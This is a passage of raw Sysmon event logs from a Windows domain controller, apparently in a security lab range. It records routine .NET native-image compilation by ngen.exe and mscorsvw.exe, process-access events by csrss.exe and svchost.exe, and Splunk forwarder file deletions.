21:05:46.013{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A22A-60D3-8304-00000000CF01}6808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021627Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:46.013{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22A-60D3-8304-00000000CF01}6808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021659Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:47.950{4DB9351A-A22B-60D3-8A04-00000000CF01}6756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a64-0\System.EnterpriseServices.dll2021-06-23 21:05:47.950 11241100x800000000000000021658Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 
21:05:51.674{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22F-60D3-9504-00000000CF01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021700Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:51.596{4DB9351A-A22F-60D3-9404-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1864-0\System.IO.Compression.FileSystem.dll2021-06-23 21:05:51.596 10341000x800000000000000021699Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:51.565{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22F-60D3-9404-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021698Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.549{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A22F-60D3-9404-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021697Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:51.549{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22F-60D3-9404-00000000CF01}6244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021696Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:51.503{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22F-60D3-9304-00000000CF01}6788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021695Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.487{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A22F-60D3-9304-00000000CF01}6788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021694Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:51.487{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22F-60D3-9304-00000000CF01}6788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021693Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:51.424{4DB9351A-A22F-60D3-9204-00000000CF01}6648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\19f8-0\System.IO.Compression.dll2021-06-23 21:05:51.424 10341000x800000000000000021692Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:51.284{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22F-60D3-9204-00000000CF01}6648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021691Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.253{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A22F-60D3-9204-00000000CF01}6648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021690Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:51.253{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22F-60D3-9204-00000000CF01}6648C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021689Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:51.206{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22F-60D3-9104-00000000CF01}6612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021688Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.174{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A22F-60D3-9104-00000000CF01}6612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021687Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:51.174{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22F-60D3-9104-00000000CF01}6612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021686Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:51.112{4DB9351A-A22E-60D3-9004-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\fec-0\System.IdentityModel.Services.dll2021-06-23 21:05:51.112 23542300x800000000000000021685Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.081{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D6F13B24738F1268A9F5308D66BB3EDC,SHA256=FA395725979C0DAB615473BF3C612DDA4FA5ED5618A103F23BB0368E59A7C330,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021716Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:52.831{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29679210C1150072469DD397E3862661,SHA256=4B1002DBE85C7E2774912D3A3B706CEF8EB4AA335F675E45C692065D2F4C08F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021715Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:52.331{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8FA1943A2FABBAC5C3544158233DD89,SHA256=B18273EECAD546BC9D01425BFE18FA8030AB04C21786A3C5B6B464CC6FF8A3DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021714Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:52.284{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A230-60D3-9804-00000000CF01}3196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021713Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:52.253{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A230-60D3-9804-00000000CF01}3196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021712Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:52.253{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A230-60D3-9804-00000000CF01}3196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021711Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:52.065{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A230-60D3-9704-00000000CF01}6152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021710Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:52.049{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A230-60D3-9704-00000000CF01}6152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021709Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:05:52.049{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A230-60D3-9704-00000000CF01}6152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscors